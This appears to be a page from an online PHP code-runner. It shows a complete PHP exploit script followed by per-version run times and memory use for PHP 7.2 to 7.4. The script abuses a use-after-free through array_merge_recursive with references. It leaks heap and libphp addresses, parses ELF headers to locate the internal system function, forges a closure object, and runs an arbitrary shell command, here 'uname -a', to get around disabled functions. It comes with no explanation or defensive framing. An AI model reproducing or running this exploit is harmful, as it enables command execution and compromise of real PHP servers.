@ 2020-10-28T03:13:18Z <?php
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper;
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
$str_2 = substr(str_shuffle(str_repeat('A', 79)), 0);
$array_process_3 = array("str_2" => &$str_2, "arg_2" => &$str_2);
$array_process_3 = array_merge_recursive($array_process_3, $array_process_3);
$array_process_3 = null;
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$abc = $str_2;
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
printf("[*] closure handlers address is 0x%x <br>", $closure_handlers);
printf("[*] libphp base address is 0x%x <br>", $base);
printf("[*] abc address is 0x%x <br>", $abc_addr);
($helper->b)($cmd);
exit();
}
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).
Version System time (s) User time (s) Memory (MiB) 7.4.12 0.009 0.009 16.61 7.4.11 0.008 0.017 16.60 7.4.10 0.010 0.008 16.75 7.4.9 0.010 0.013 16.50 7.4.8 0.006 0.014 16.70 7.4.7 0.013 0.008 16.70 7.4.6 0.009 0.013 16.80 7.4.5 0.007 0.014 16.80 7.4.4 0.003 0.017 16.78 7.4.3 0.009 0.013 16.66 7.4.2 0.010 0.013 16.71 7.4.1 0.012 0.011 16.67 7.4.0 0.021 0.000 16.88 7.3.24 0.018 0.000 16.40 7.3.23 0.013 0.013 16.41 7.3.22 0.017 0.004 16.80 7.3.21 0.009 0.012 16.68 7.3.20 0.018 0.015 16.62 7.3.19 0.003 0.019 16.50 7.3.18 0.011 0.010 16.66 7.3.17 0.013 0.009 16.75 7.3.16 0.016 0.008 16.83 7.3.15 0.009 0.012 16.71 7.3.14 0.013 0.008 16.59 7.3.13 0.014 0.008 16.81 7.3.12 0.018 0.005 16.48 7.3.11 0.016 0.013 16.73 7.3.10 0.003 0.020 16.55 7.3.9 0.010 0.014 16.54 7.3.8 0.015 0.009 16.51 7.3.7 0.009 0.012 16.43 7.3.6 0.006 0.013 16.43 7.3.5 0.017 0.014 16.62 7.3.4 0.009 0.012 16.68 7.3.3 0.009 0.015 16.43 7.3.2 0.015 0.010 16.63 7.3.1 0.009 0.012 16.36 7.3.0 0.010 0.010 16.54 7.2.34 0.016 0.006 16.79 7.2.33 0.010 0.010 16.60 7.2.32 0.015 0.012 16.50 7.2.31 0.010 0.010 16.84 7.2.30 0.020 0.000 16.74 7.2.29 0.017 0.005 16.96 7.2.28 0.014 0.003 16.67 7.2.27 0.013 0.006 16.69 7.2.26 0.003 0.016 16.60 7.2.25 0.020 0.007 16.85 7.2.24 0.018 0.004 16.66 7.2.23 0.013 0.007 16.78 7.2.22 0.013 0.011 16.54 7.2.21 0.012 0.009 16.67 7.2.20 0.011 0.007 16.56 7.2.19 0.009 0.009 16.64 7.2.18 0.016 0.008 16.55 7.2.17 0.009 0.012 16.59 7.2.16 0.013 0.007 16.64 7.2.15 0.009 0.009 16.79 7.2.14 0.011 0.008 16.86 7.2.13 0.011 0.011 16.81 7.2.12 0.011 0.011 16.46 7.2.11 0.014 0.006 16.62 7.2.10 0.012 0.008 16.59 7.2.9 0.016 0.003 16.66 7.2.8 0.068 0.014 16.91 7.2.7 0.014 0.008 16.74 7.2.6 0.011 0.011 16.58 7.2.5 0.009 0.009 16.77 7.2.4 0.013 0.008 16.63 7.2.3 0.010 0.013 16.83 7.2.2 0.012 0.009 16.91 7.2.1 0.006 0.017 16.77 7.2.0 0.014 0.007 16.80
preferences:dark mode live preview
22.46 ms | 401 KiB | 5 Q